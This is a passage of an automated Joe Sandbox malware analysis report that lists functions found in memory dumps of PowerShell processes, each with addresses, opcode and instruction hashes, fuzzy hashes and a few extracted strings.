                                                                    • Opcode ID: 10abfb700f5b72a52a00b13b8959a89841a5c35f211ede4ed9087e085137de03
                                                                    • Instruction ID: 0fb67c02d8123ffd3d19248c0deeb22311677288e8c00d1c850589a375cb7617
                                                                    • Opcode Fuzzy Hash: 10abfb700f5b72a52a00b13b8959a89841a5c35f211ede4ed9087e085137de03
                                                                    • Instruction Fuzzy Hash: 4CD0A79270216127175838FE19146BBF5CE8EC54AA706017AEF0AF33A1EE50EC0A43F2
                                                                    Function 0471DCE8 Relevance: .0, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                    • Instruction ID: 390815f62179a2200dc092fc07701b3e7d229f608f11183bc04905b7fae528b1
                                                                    • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                    • Instruction Fuzzy Hash: 0BE08631B10014A78B18996ED4504EDFBAADBCC621F04807BD90AA7350DA7279168AE1
                                                                    Function 0471DC98 Relevance: .0, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b71f6180f29478aff3605a5ef4da352e3b78918c9d3ce74f7afd33a2bf15cff6
                                                                    • Instruction ID: a27ef2b8dfb5c292fac83fb42dbac366ce38f144e2aba611780a68d5be2f60ae
                                                                    • Opcode Fuzzy Hash: b71f6180f29478aff3605a5ef4da352e3b78918c9d3ce74f7afd33a2bf15cff6
                                                                    • Instruction Fuzzy Hash: 72E08C31700611478326AA1EA80089F7ADADEC5675310442EE10987350DEA4F9058BD5
                                                                    Function 0471C580 Relevance: .0, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4f6c101c1a68c67542a5a3b8bd81f0946ecdd6a0ecd7a1d104d469c10083482b
                                                                    • Instruction ID: f6cf73a01a9a1162924c590dd13f72cab8cc4eb15c55cdace85ae2a704d60407
                                                                    • Opcode Fuzzy Hash: 4f6c101c1a68c67542a5a3b8bd81f0946ecdd6a0ecd7a1d104d469c10083482b
                                                                    • Instruction Fuzzy Hash: 02E086313082511F8301676CE824465BBE9EED696530800BFE549D3392EE25EC0587A5
                                                                    Function 04718739 Relevance: .0, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 099079a7e0346f97e3a4ec9ed7a3e10e05c862b9f1f4718633a08a40bab78c36
                                                                    • Instruction ID: b99055b90a5375c2fa71ced27ecaf76e86b02e7b21da5c637e06a68b5156f570
                                                                    • Opcode Fuzzy Hash: 099079a7e0346f97e3a4ec9ed7a3e10e05c862b9f1f4718633a08a40bab78c36
                                                                    • Instruction Fuzzy Hash: 15E01A318081498FCB09EFB8D4698FA7F34EE16705B0102AED556976A2DB31268ACB81
                                                                    Function 04718800 Relevance: .0, Instructions: 21COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3d2fdb628c9e9722ae651569d94a76125978481d9d098dce71495f280639231e
                                                                    • Instruction ID: 52d4a6f68336ca274bf90c0f9bb69637252c00a4b15df420b26fe0f6b8dc58d9
                                                                    • Opcode Fuzzy Hash: 3d2fdb628c9e9722ae651569d94a76125978481d9d098dce71495f280639231e
                                                                    • Instruction Fuzzy Hash: BBE09A34A0824A8FCB08DF78D0818ADBFB0EF4A204B0442ADDD469B321E6302844CF80
                                                                    Function 0471C590 Relevance: .0, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 27621b50a04e10d92d3993aea45a5ae04ed77af4378e25f4e5c1dd3d0079e699
                                                                    • Instruction ID: 36ef6a5a21523a4cf573734bf09ca873321059c052fdc6dbd32adccc61f5c964
                                                                    • Opcode Fuzzy Hash: 27621b50a04e10d92d3993aea45a5ae04ed77af4378e25f4e5c1dd3d0079e699
                                                                    • Instruction Fuzzy Hash: 7DD0A7353001101F4204635DF80846977DDEFC9976708003EE60ED3381DE21EC0183E4
                                                                    Function 0471F870 Relevance: .0, Instructions: 16COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                    • Instruction ID: 273a58f117f567015c64f8b694f15d512828c4317c693c80d8c299031c8aa54e
                                                                    • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                    • Instruction Fuzzy Hash: 76D06270D042099F8780EFADC94156DFBF4EB48200F5085AAC919E7311F7315612DBD1
                                                                    Function 04718748 Relevance: .0, Instructions: 15COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 65966269212f7023eed800f17f81502037ba2f75fc709bc5b6773f4bd9c39b23
                                                                    • Instruction ID: ca15cc42014c3d9bd244d7b33163a8c862641b6e7240d01793c080a5177be932
                                                                    • Opcode Fuzzy Hash: 65966269212f7023eed800f17f81502037ba2f75fc709bc5b6773f4bd9c39b23
                                                                    • Instruction Fuzzy Hash: FDD067319041098BCB08ABA5E85A4FDBB74FE14305F40416ED91B52692EB312A9ACBC5
                                                                    Function 04718810 Relevance: .0, Instructions: 15COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f4c57dac840126c3e8825fe732b1fee5a344e279870e9f877137af42f39eb314
                                                                    • Instruction ID: 5e92790ce8f0b9633dec2791846a9dfc40d1572df0b84b724dae6100b9c6477d
                                                                    • Opcode Fuzzy Hash: f4c57dac840126c3e8825fe732b1fee5a344e279870e9f877137af42f39eb314
                                                                    • Instruction Fuzzy Hash: 73D01734A0820A8F8B18EFA8E44686EBBB4EB44204F00416AED0A93350EA306841CFC1
                                                                    Function 04717932 Relevance: .0, Instructions: 14COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f80bc9294e849fde6c6632145d9b09e60eac9bd8c35d31f5f547ac38e1ed4662
                                                                    • Instruction ID: 734698fcd443b744c172314ca4659511a8cd344509bf6fedb2d75a4904dde0cf
                                                                    • Opcode Fuzzy Hash: f80bc9294e849fde6c6632145d9b09e60eac9bd8c35d31f5f547ac38e1ed4662
                                                                    • Instruction Fuzzy Hash: 04D0C93808E7C49FC7279F78A8958183F34AE0316575A04DED886AF9B3C9668498CB47
                                                                    Function 04717EA0 Relevance: .0, Instructions: 12COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9b82cddb71eb8442a4a375aca56ed3c01221c2bddca5a0b8def1829f282ab7f9
                                                                    • Instruction ID: 6023ec0a81b6c6e02cb862a1177fc5b5b17c727202feab957b5fd7c52087d7b3
                                                                    • Opcode Fuzzy Hash: 9b82cddb71eb8442a4a375aca56ed3c01221c2bddca5a0b8def1829f282ab7f9
                                                                    • Instruction Fuzzy Hash: 34C0122A01E2C00FEB0ACB34D8A5A223F32AA4320030A41DEC082DA8A2C929444ACB12
                                                                    Function 04717940 Relevance: .0, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a6c1baa25d3e63cdf67fffa1db883aac6c78c42ec697233c4e1f489d73026070
                                                                    • Instruction ID: 03fdca12eaefd511a1ea7af78dc768a3de9f6922fa7f47369f4ae135c5482267
                                                                    • Opcode Fuzzy Hash: a6c1baa25d3e63cdf67fffa1db883aac6c78c42ec697233c4e1f489d73026070
                                                                    • Instruction Fuzzy Hash: 81B09234185B488FC3586F75A804814772DBB4022578114E8E80E0A6A2CE76E884CA49

                                                                    Executed Functions

                                                                    Function 04B0B490 Relevance: 2.8, Strings: 2, Instructions: 252COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: {YCn^$YCn^
                                                                    • API String ID: 0-3695118941
                                                                    • Opcode ID: fc62cfc8f9a4d806b7a1fbe22a2940ad47f9292f117df3c4f392a3db96c8e9a0
                                                                    • Instruction ID: d3a13bc8a207241dadfd87574b0c95a6d977b011df160efe2fef268fd7fb4683
                                                                    • Opcode Fuzzy Hash: fc62cfc8f9a4d806b7a1fbe22a2940ad47f9292f117df3c4f392a3db96c8e9a0
                                                                    • Instruction Fuzzy Hash: C3917A75F017559BEB19EFB588106AEBAB3EFC4700B40892DD156AB380DF34AD018BD6
                                                                    Function 075D2308 Relevance: 8.2, Strings: 6, Instructions: 667COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2382211808.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_75d0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: piRk$piRk$piRk$piRk$piRk$|,Tk
                                                                    • API String ID: 0-884015819
                                                                    • Opcode ID: 3a5033f52dadcefa74e8482288995563233235e128f5c7ea0e2a397b497d0847
                                                                    • Instruction ID: 9f7a53e6e86f633a8129140720e38f9166030644fbbd3f0a6c5240510e6b2394
                                                                    • Opcode Fuzzy Hash: 3a5033f52dadcefa74e8482288995563233235e128f5c7ea0e2a397b497d0847
                                                                    • Instruction Fuzzy Hash: 162223B1A00206DFDB318BACC4417EABBE1BFC5211F1484BAE505DB652DB75CD46CBA2
                                                                    Function 04B0E5B9 Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: piRk
                                                                    • API String ID: 0-1603274793
                                                                    • Opcode ID: a50ce2e0bae5535d42d10aee8a70a758875bbc49af18e9b93f010d90aec42073
                                                                    • Instruction ID: e8efa8093c1861fc517c6de73fc7d9962f394794847c0f0de25088b131e65769
                                                                    • Opcode Fuzzy Hash: a50ce2e0bae5535d42d10aee8a70a758875bbc49af18e9b93f010d90aec42073
                                                                    • Instruction Fuzzy Hash: 85416B35A04245DFCB19DFB8E4A4A9DBFF2EF89304F1485ADD416AB391DB30A905CB90
                                                                    Function 04B0E610 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: piRk
                                                                    • API String ID: 0-1603274793
                                                                    • Opcode ID: 9a37467965772b465408eafc02f8d5ff1057f2005e28108c52e0ffa6576a449f
                                                                    • Instruction ID: 982eced5b7e26993d936495304a5747f8525355ff7c99c6fed84967f3fd9946d
                                                                    • Opcode Fuzzy Hash: 9a37467965772b465408eafc02f8d5ff1057f2005e28108c52e0ffa6576a449f
                                                                    • Instruction Fuzzy Hash: 2A419C35A04245DFCB19DF78D4A4A9DBBF2FF89304F1485ADD416AB391CB30A904CBA0
                                                                    Function 04B0E640 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: piRk
                                                                    • API String ID: 0-1603274793
                                                                    • Opcode ID: 4ca8d8cacb7deb82367f04f72c3eb82108ae06c3ad02c8c05da6c61a9eba6a64
                                                                    • Instruction ID: 185aecebc6f7a7a16595f53e922903804fdead0df149ae0e5576d5fbd89e2b82
                                                                    • Opcode Fuzzy Hash: 4ca8d8cacb7deb82367f04f72c3eb82108ae06c3ad02c8c05da6c61a9eba6a64
                                                                    • Instruction Fuzzy Hash: EB316934A00206DFCB18EF79D594A9EBBF2FF88304F108569D416AB390DB74AD05CB90
                                                                    Function 04B0DC88 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: +/Cn^
                                                                    • API String ID: 0-76185464
                                                                    • Opcode ID: c00a4b1e8c0c6d43882cabeb7cb080a90d52400fa6fbd2baa5c23da64a4166e0
                                                                    • Instruction ID: 4d88dd6667700bc92ffe9154b028f4345366a3a73a37b66a022a6569296b880a
                                                                    • Opcode Fuzzy Hash: c00a4b1e8c0c6d43882cabeb7cb080a90d52400fa6fbd2baa5c23da64a4166e0
                                                                    • Instruction Fuzzy Hash: 59F02B327051405FC715C7ACE4109EE3F6ADEC727231445DFD006CB281CA60A8058BF1
                                                                    Function 04B0DC98 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: +/Cn^
                                                                    • API String ID: 0-76185464
                                                                    • Opcode ID: 6762855c6425c65d9fe068c1d3c63268dea9b717ef6867ca95c556e25e1d716b
                                                                    • Instruction ID: d232bdf24750fc1a5949071bbc943a00b9794ed61ec23eac426ddd464bbe697a
                                                                    • Opcode Fuzzy Hash: 6762855c6425c65d9fe068c1d3c63268dea9b717ef6867ca95c556e25e1d716b
                                                                    • Instruction Fuzzy Hash: 77E0C236700610578725A66EA81089F7FEFDFC4672364856EE109CB384DFA4EC0547D5
                                                                    Function 075D3CE8 Relevance: .6, Instructions: 596COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2382211808.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_75d0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 85b9b6dea437c93a36671b1c568df90f4192e6a2fb8b37afa04c744eb15a5291
                                                                    • Instruction ID: 445a2da318d7535e53f7e5635bc736db0382c177afbb84308c402346dcb4afda
                                                                    • Opcode Fuzzy Hash: 85b9b6dea437c93a36671b1c568df90f4192e6a2fb8b37afa04c744eb15a5291
                                                                    • Instruction Fuzzy Hash: 4E1203B1700246CFDB359AAC89107EABBA2BFC5250F14846BD905CB391DB72DC46C7A2
                                                                    Function 075D17B8 Relevance: .3, Instructions: 344COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2382211808.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_75d0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 06690a3fb3290ca9c37823a85c13732df1b83101013f1bbdfcd3abfe1de81179
                                                                    • Instruction ID: 71b726382ab5b8d6a498335a83b97c89d65590a88a608c6e9ceed45a874086fe
                                                                    • Opcode Fuzzy Hash: 06690a3fb3290ca9c37823a85c13732df1b83101013f1bbdfcd3abfe1de81179
                                                                    • Instruction Fuzzy Hash: 9DB123B1B0460ADFDB249BBCD4006EABBA6BFC6210F19847BD509CB252DB31DD45C7A1
                                                                    Function 04B0E7B8 Relevance: .3, Instructions: 254COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 75c63e3268f251094d0cd95274500eb6e3d75b07fd5fd07240d59d841d729f29
                                                                    • Instruction ID: 36aaa2c2331f203fc43254dae4d6e94a683b890aa9e812eadf826470afa827fc
                                                                    • Opcode Fuzzy Hash: 75c63e3268f251094d0cd95274500eb6e3d75b07fd5fd07240d59d841d729f29
                                                                    • Instruction Fuzzy Hash: 0B912A34B102148FCB14DFB8D59456DBBE6AF88711B1588AAE906EB395DF70EC42CB90
                                                                    Function 04B029F0 Relevance: .2, Instructions: 210COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a1742e2bb2acb2fceca8bc5dfb5c3f8659e09a3010b65f444e9923a6eb50bd84
                                                                    • Instruction ID: 95089a5a67fa4551680167b50f3157616d5df620b04793d93c3c9f20891cfa9e
                                                                    • Opcode Fuzzy Hash: a1742e2bb2acb2fceca8bc5dfb5c3f8659e09a3010b65f444e9923a6eb50bd84
                                                                    • Instruction Fuzzy Hash: D8917F74A00605CFCB19CF59C498AAEFBB1FF88310B248699D915AB3A5C735FC52CB90
                                                                    Function 04B0BAB0 Relevance: .2, Instructions: 160COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d5b3a65962957f3f69d8988d0121d9d2354c72b7c8a8abe5b58ec4b18f781fc5
                                                                    • Instruction ID: 0296fbc3524624038336cfb07dcfad5872e6c7cf25834bb92d532d75eb22284b
                                                                    • Opcode Fuzzy Hash: d5b3a65962957f3f69d8988d0121d9d2354c72b7c8a8abe5b58ec4b18f781fc5
                                                                    • Instruction Fuzzy Hash: D8614A75E04248DFCB14CFA9C484A8DBFF1EF88310F19816AE819AB255DB74A941CB50
                                                                    Function 04B07728 Relevance: .2, Instructions: 156COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 983e9249066e37f1809d5bb4f8c9b4b2c289eb3916d3fcbc99db276f35688e40
                                                                    • Instruction ID: be7653b739282a7f38f695eea7f3453e47a72af63c4388ccbbf3fbcfc0b5b762
                                                                    • Opcode Fuzzy Hash: 983e9249066e37f1809d5bb4f8c9b4b2c289eb3916d3fcbc99db276f35688e40
                                                                    • Instruction Fuzzy Hash: D951AA343042059FD714DB69D854A6ABBEAEFC9255B1584AAE509CB392EF31FC01CBA0
                                                                    Function 04B0BAC0 Relevance: .2, Instructions: 155COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3379df6a67521a45933b58aff90e8cc670b32cb92fe4bcad22bfcd2720f25fb5
                                                                    • Instruction ID: 546b60aa09131f879cdfa9555b438dc80557fba5dff1c61e75350d2e5ab994bf
                                                                    • Opcode Fuzzy Hash: 3379df6a67521a45933b58aff90e8cc670b32cb92fe4bcad22bfcd2720f25fb5
                                                                    • Instruction Fuzzy Hash: BA611875E00248DFDB14CFA9C584A8DFFF1EF88311F29816AE819AB255EB74AD41CB50
                                                                    Function 04B0E419 Relevance: .1, Instructions: 140COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c583fef22ea31dd486f1b7549037096a483443c65204512410871ef83a070baf
                                                                    • Instruction ID: becf788df81f3ed6421b039f32dc964e827485164fffcb67fc0e51c40098b276
                                                                    • Opcode Fuzzy Hash: c583fef22ea31dd486f1b7549037096a483443c65204512410871ef83a070baf
                                                                    • Instruction Fuzzy Hash: 5B514774700205CFCB14EF6CC49496EBBE6EF8931575989A9E5098F3A6EB34EC01CB61
                                                                    Function 04B0E428 Relevance: .1, Instructions: 130COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e490612691ef1e836b3d1bf68c6446699282cb103223cb01394431b559a5096d
                                                                    • Instruction ID: 9e80f4b5d56b05ff2a474c37f443d3a813c672c2634713893ffebec110b10e37
                                                                    • Opcode Fuzzy Hash: e490612691ef1e836b3d1bf68c6446699282cb103223cb01394431b559a5096d
                                                                    • Instruction Fuzzy Hash: 0C412574700205CFCB10EF6CC59496EBBE6EFC8215B5589A9E5098B395EB34EC018FA1
                                                                    Function 075D3CCC Relevance: .1, Instructions: 122COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2382211808.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_75d0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ccd615e6b79811d49d9c83b9d03129c5ff62855ee881567c2d985f97e6749b93
                                                                    • Instruction ID: eefa6dee86e1f48a0ae77ccbb383111002859588d04b591efad2e6a2866e8b04
                                                                    • Opcode Fuzzy Hash: ccd615e6b79811d49d9c83b9d03129c5ff62855ee881567c2d985f97e6749b93
                                                                    • Instruction Fuzzy Hash: BA41A2F0A00202DBCB359F5CC6506EA77A2FBC5680B1588AAD9049B391C735DD4ACBA3
                                                                    Function 04B06FC8 Relevance: .1, Instructions: 114COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 14c7e0dfb5877b43cfdd4b2ece9266adbbd4be8d17f5b53d1c23b82efdb7df81
                                                                    • Instruction ID: 8bf9d6b2a5799c772ed41ae384dc8aa14ab527d4626af9feb1bcd4ed365ec378
                                                                    • Opcode Fuzzy Hash: 14c7e0dfb5877b43cfdd4b2ece9266adbbd4be8d17f5b53d1c23b82efdb7df81
                                                                    • Instruction Fuzzy Hash: 90411C34B042048FDB19DFA4C498AADBBF2EF8D715F148599D502AB391EE35ED01CB61
                                                                    Function 04B02B00 Relevance: .1, Instructions: 109COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2353922308.0000000004B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_4b00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
